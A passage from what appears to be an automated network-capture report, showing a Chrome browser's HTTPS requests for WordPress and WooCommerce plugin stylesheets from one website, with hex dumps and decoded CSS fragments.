                                                                                                          2024-12-12 11:58:02 UTC16384INData Raw: 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 66 6f 72 6d 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 63 6f 6d 62 6f 62 6f 78 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 63 6f 6d 62 6f 62 6f 78 2d 63 6f 6e 74 72 6f 6c 20 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2d 66 6f 72 6d 2d 74 6f 6b 65 6e 2d 66 69 65 6c 64 5f 5f 73 75 67 67 65 73 74 69 6f 6e 73 2d 6c 69 73 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 65 31 65 31 65 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 63 6f 6d 62 6f 62 6f 78 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 63 6f 6d 62 6f 62 6f 78 2d 63 6f 6e 74 72 6f 6c 20 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2d 66
                                                                                                          Data Ascii: -block-components-form .wc-block-components-combobox .wc-block-components-combobox-control .components-form-token-field__suggestions-list{background-color:#1e1e1e;color:#fff}.wc-block-components-combobox .wc-block-components-combobox-control .components-f
                                                                                                          2024-12-12 11:58:02 UTC16384INData Raw: 73 2d 70 72 69 63 65 2d 73 6c 69 64 65 72 2e 69 73 2d 6c 6f 61 64 69 6e 67 2e 69 73 2d 64 69 73 61 62 6c 65 64 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 70 72 69 63 65 2d 73 6c 69 64 65 72 5f 5f 72 61 6e 67 65 2d 69 6e 70 75 74 2d 77 72 61 70 70 65 72 7b 6f 75 74 6c 69 6e 65 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 62 65 62 65 62 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b
                                                                                                          Data Ascii: s-price-slider.is-loading.is-disabled .wc-block-components-price-slider__range-input-wrapper{outline:0!important;border:0!important;background-color:#ebebeb!important;color:transparent!important;width:100%;border-radius:.25rem;display:block;line-height:1;
                                                                                                          2024-12-12 11:58:02 UTC16384INData Raw: 6f 70 3a 30 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 39 30 64 65 67 2c 23 65 62 65 62 65 62 2c 23 66 35 66 35 66 35 2c 23 65 62 65 62 65 62 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 30 25 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6c 6f 61 64 69 6e 67 5f 5f 61 6e 69 6d 61 74 69 6f 6e 20 31 2e 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6c 6f 61 64 69 6e 67 5f 5f 61 6e 69 6d 61 74 69 6f 6e 20 31 2e 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 69 6e 66 69 6e 69 74 65 7d
                                                                                                          Data Ascii: op:0;height:100%;background-repeat:no-repeat;background-image:linear-gradient(90deg,#ebebeb,#f5f5f5,#ebebeb);transform:translateX(-100%);-webkit-animation:loading__animation 1.5s ease-in-out infinite;animation:loading__animation 1.5s ease-in-out infinite}
                                                                                                          2024-12-12 11:58:02 UTC16384INData Raw: 5f 6f 70 74 69 6f 6e 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 72 61 64 69 6f 2d 63 6f 6e 74 72 6f 6c 5f 5f 6f 70 74 69 6f 6e 2d 6c 61 79 6f 75 74 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 72 61 64 69 6f 2d 63 6f 6e 74 72 6f 6c 5f 5f 64 65 73 63 72 69 70 74 69 6f 6e 2d 67 72 6f 75 70 2c 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 72 61 64 69 6f 2d 63 6f 6e 74 72 6f 6c 5f 5f 6c 61 62 65 6c 2d 67 72 6f 75 70 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 72 6f 77 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 72 61 64 69 6f 2d 63 6f 6e 74 72 6f 6c 5f 5f 64 65 73 63 72 69 70 74 69 6f 6e 2d 67 72 6f 75 70 3e 73 70 61 6e
                                                                                                          Data Ascii: _option .wc-block-components-radio-control__option-layout:after{display:none}.wc-block-components-radio-control__description-group,.wc-block-components-radio-control__label-group{display:table-row}.wc-block-components-radio-control__description-group>span
                                                                                                          2024-12-12 11:58:02 UTC16384INData Raw: 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 74 61 62 73 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 74 61 62 73 5f 5f 6c 69 73 74 3e 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 74 61 62 73 5f 5f 69 74 65 6d 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 74 61 62 73 5f 5f 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 3e 69 6d 67 2c 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 74 61 62 73 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 74 61 62 73 5f 5f 6c 69 73 74 3e 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 74 61 62 73 5f 5f 69 74 65 6d 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73
                                                                                                          Data Ascii: weight:700}.wc-block-components-tabs .wc-block-components-tabs__list>.wc-block-components-tabs__item .wc-block-components-tabs__item-content>img,.wc-block-components-tabs .wc-block-components-tabs__list>.wc-block-components-tabs__item .wc-block-components
                                                                                                          2024-12-12 11:58:02 UTC16384INData Raw: 74 79 29 2b 6c 61 62 65 6c 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 34 70 78 29 20 73 63 61 6c 65 28 2e 37 35 29 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 67 61 74 65 77 61 79 2d 63 6f 6e 74 61 69 6e 65 72 2e 77 63 2d 69 6e 6c 69 6e 65 2d 63 61 72 64 2d 65 6c 65 6d 65 6e 74 2b 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 76 61 6c 69 64 61 74 69 6f 6e 2d 65 72 72 6f 72 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 34 70 78 7d 2e 77 63 2d 62 6c 6f 63 6b 2d 67 61 74 65 77 61 79 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 61 74 65 77 61 79 2d 69 6e 70 75 74 2e 66 6f 63 75 73 65 64 2e 65 6d 70 74 79 2c 2e 77 63
                                                                                                          Data Ascii: ty)+label{margin-left:16px;transform:translateY(4px) scale(.75)}.wc-block-gateway-container.wc-inline-card-element+.wc-block-components-validation-error{position:static;margin-top:-24px}.wc-block-gateway-container .wc-block-gateway-input.focused.empty,.wc
                                                                                                          2024-12-12 11:58:02 UTC16384INData Raw: 79 2c 2e 69 73 2d 6d 65 64 69 75 6d 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 68 65 63 6b 6f 75 74 5f 5f 73 68 69 70 70 69 6e 67 2d 66 69 65 6c 64 73 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 61 64 64 72 65 73 73 2d 66 6f 72 6d 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 61 64 64 72 65 73 73 2d 66 6f 72 6d 5f 5f 61 64 64 72 65 73 73 5f 31 2c 2e 69 73 2d 6d 65 64 69 75 6d 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 68 65 63 6b 6f 75 74 5f 5f 73 68 69 70 70 69 6e 67 2d 66 69 65 6c 64 73 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 61 64 64 72 65 73 73 2d 66 6f 72 6d 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 61 64 64 72 65 73 73 2d 66 6f 72 6d 5f 5f 61 64 64 72 65 73 73 5f 32 2c 2e
                                                                                                          Data Ascii: y,.is-medium .wc-block-checkout__shipping-fields .wc-block-components-address-form .wc-block-components-address-form__address_1,.is-medium .wc-block-checkout__shipping-fields .wc-block-components-address-form .wc-block-components-address-form__address_2,.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.2449777147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:01 UTC603OUTGET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.9.6 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:01 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:01 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Thu, 04 Jul 2024 23:27:33 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2894
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:01 UTC2894INData Raw: 2e 77 70 63 66 37 20 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 72 65 73 70 6f 6e 73 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 0a 09 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0a 09 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 2d 31 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 6f 72 64 65 72 3a 20 30 3b 0a 09 77 6f 72 64 2d 77 72 61 70 3a 20 6e 6f 72 6d 61 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 77 70 63 66 37 20 66 6f 72 6d 20 2e 77 70 63 66 37 2d 72 65 73 70 6f
                                                                                                          Data Ascii: .wpcf7 .screen-reader-response {position: absolute;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);clip-path: inset(50%);height: 1px;width: 1px;margin: -1px;padding: 0;border: 0;word-wrap: normal !important;}.wpcf7 form .wpcf7-respo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.2449780147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:01 UTC626OUTGET /wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.css?ver=6.7.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:02 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:01 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 10 May 2024 09:02:59 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 28486
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:02 UTC16384INData Raw: 2f 2a 2a 0a 0a 09 47 65 6e 65 72 69 63 6f 6e 73 0a 0a 2a 2f 0a 0a 0a 2f 2a 20 49 45 38 20 61 6e 64 20 62 65 6c 6f 77 20 75 73 65 20 45 4f 54 20 61 6e 64 20 61 6c 6c 6f 77 20 63 72 6f 73 73 2d 73 69 74 65 20 65 6d 62 65 64 64 69 6e 67 2e 20 0a 20 20 20 49 45 39 20 75 73 65 73 20 57 4f 46 46 20 77 68 69 63 68 20 69 73 20 62 61 73 65 36 34 20 65 6e 63 6f 64 65 64 20 74 6f 20 61 6c 6c 6f 77 20 63 72 6f 73 73 2d 73 69 74 65 20 65 6d 62 65 64 64 69 6e 67 2e 0a 20 20 20 53 6f 20 75 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 49 45 39 20 77 69 6c 6c 20 74 68 72 6f 77 20 61 20 63 6f 6e 73 6f 6c 65 20 65 72 72 6f 72 2c 20 62 75 74 20 69 74 27 6c 6c 20 73 74 69 6c 6c 20 77 6f 72 6b 2e 0a 20 20 20 57 68 65 6e 20 74 68 65 20 66 6f 6e 74 20 69 73 20 62 61 73 65 36 34 20
                                                                                                          Data Ascii: /**Genericons*//* IE8 and below use EOT and allow cross-site embedding. IE9 uses WOFF which is base64 encoded to allow cross-site embedding. So unfortunately, IE9 will throw a console error, but it'll still work. When the font is base64
                                                                                                          2024-12-12 11:58:02 UTC12102INData Raw: 64 47 33 53 53 35 67 42 4c 36 49 43 70 7a 78 48 5a 45 4b 43 57 55 35 34 55 4a 4a 4f 41 63 64 68 65 70 72 4c 74 7a 69 58 41 52 72 4a 31 76 64 44 6a 43 4c 61 78 42 42 73 6b 76 69 4f 71 63 38 62 68 47 67 77 6f 4f 53 43 77 6d 4b 35 48 4c 71 37 73 51 54 4f 75 57 67 49 66 49 59 4e 2f 73 76 76 42 7a 2f 77 4b 44 2f 78 6a 52 69 4f 49 30 59 50 4a 5a 77 64 2f 76 48 2b 54 6e 2b 75 6f 4f 58 36 4d 5a 58 72 54 47 68 50 52 41 4f 42 71 46 2f 56 71 41 4e 68 5a 37 61 2f 4d 77 43 6c 6f 6d 77 62 4d 33 58 6a 47 52 6f 64 33 39 6f 5a 67 78 59 74 34 63 7a 46 77 76 70 62 6e 5a 6a 71 63 43 61 53 2f 38 61 58 2f 4e 48 30 74 79 4e 36 2f 50 70 49 4d 70 36 30 6b 54 6c 6b 45 64 38 7a 53 73 55 45 4e 6b 47 63 42 51 56 36 54 50 30 35 4c 4d 61 57 4c 65 2b 41 6a 43 67 33 2f 76 74 58 6d 33 6c
                                                                                                          Data Ascii: dG3SS5gBL6ICpzxHZEKCWU54UJJOAcdheprLtziXARrJ1vdDjCLaxBBskviOqc8bhGgwoOSCwmK5HLq7sQTOuWgIfIYN/svvBz/wKD/xjRiOI0YPJZwd/vH+Tn+uoOX6MZXrTGhPRAOBqF/VqANhZ7a/MwClomwbM3XjGRod39oZgxYt4czFwvpbnZjqcCaS/8aX/NH0tyN6/PpIMp60kTlkEd8zSsUENkGcBQV6TP05LMaWLe+AjCg3/vtXm3l


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.2449782147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:03 UTC617OUTGET /wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=6.7.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:03 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:03 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 10 May 2024 09:02:59 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 9411
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:03 UTC9411INData Raw: 2f 2a 20 42 61 63 6b 2d 65 6e 64 20 63 73 73 20 2a 2f 0a 69 2e 6d 63 65 2d 69 2d 69 63 6f 6e 20 7b 0a 20 20 20 20 66 6f 6e 74 3a 20 34 30 30 20 32 30 70 78 2f 31 20 64 61 73 68 69 63 6f 6e 73 3b 0a 09 63 6f 6c 6f 72 3a 20 23 65 30 32 62 32 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 74 6f 70 3b 0a 20 20 20 20 73 70 65 61 6b 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 32 70 78 3b
                                                                                                          Data Ascii: /* Back-end css */i.mce-i-icon { font: 400 20px/1 dashicons;color: #e02b20 !important; padding: 0; vertical-align: top; speak: none; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; margin-left: -2px;


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.2449781147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:03 UTC606OUTGET /wp-content/plugins/woocommerce-products-filter/css/front.css?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:03 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:03 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 26902
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:03 UTC16384INData Raw: 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 39 70 78 3b 0a 7d 0a 0a 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 20 73 65 6c 65 63 74 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 0a 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 20 6c 61 62 65 6c 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 75 6c 2e 77 6f 6f 66 5f 6c 69 73 74 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 6c 69
                                                                                                          Data Ascii: .woof_container{ padding-bottom: 5px; margin-bottom: 9px;}.woof_container select{ width: 100%;}.woof_container label{ display: inline-block !important;}ul.woof_list{ margin: 0 !important; list-style: none !important;}li
                                                                                                          2024-12-12 11:58:03 UTC10518INData Raw: 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 70 78 3b 0a 7d 0a 0a 0a 0a 2e 77 6f 6f 66 5f 73 69 64 5f 66 6c 61 74 5f 64 61 72 6b 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 32 70 78 20 23 61 61 61 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 65 34 64 34 64 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 31 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 65 32 65 36 65 37 3b 0a 7d 0a 2e 77 6f 6f 66 5f 73 69 64 5f 66 6c 61 74 5f 64 61 72 6b 20 2e 77 6f 6f 66 5f 72 65 64 72 61 77 5f 7a 6f 6e 65 20 73 65 6c 65 63 74 2c 2e 77 6f 6f 66 5f 73 69 64 5f 66 6c 61 74 5f
                                                                                                          Data Ascii: { border-radius: 0px;}.woof_sid_flat_dark { border: solid 2px #aaa; background: #4e4d4d; margin-bottom: 11px; margin-top: 30px; padding: 12px; color: #e2e6e7;}.woof_sid_flat_dark .woof_redraw_zone select,.woof_sid_flat_


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.2449783147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:03 UTC617OUTGET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:03 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:03 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 9765
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:03 UTC9765INData Raw: 2f 2a 21 0a 43 68 6f 73 65 6e 2c 20 61 20 53 65 6c 65 63 74 20 42 6f 78 20 45 6e 68 61 6e 63 65 72 20 66 6f 72 20 6a 51 75 65 72 79 20 61 6e 64 20 50 72 6f 74 6f 74 79 70 65 0a 62 79 20 50 61 74 72 69 63 6b 20 46 69 6c 6c 65 72 20 66 6f 72 20 48 61 72 76 65 73 74 2c 20 68 74 74 70 3a 2f 2f 67 65 74 68 61 72 76 65 73 74 2e 63 6f 6d 0a 0a 56 65 72 73 69 6f 6e 20 63 75 73 74 6f 6d 0a 46 75 6c 6c 20 73 6f 75 72 63 65 20 61 74 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 68 61 72 76 65 73 74 68 71 2f 63 68 6f 73 65 6e 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 48 61 72 76 65 73 74 20 68 74 74 70 3a 2f 2f 67 65 74 68 61 72 76 65 73 74 2e 63 6f 6d 0a 0a 4d 49 54 20 4c 69 63 65 6e 73 65 2c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d
                                                                                                          Data Ascii: /*!Chosen, a Select Box Enhancer for jQuery and Prototypeby Patrick Filler for Harvest, http://getharvest.comVersion customFull source at https://github.com/harvesthq/chosenCopyright (c) Harvest http://getharvest.comMIT License, https://github.com


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.2449784147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
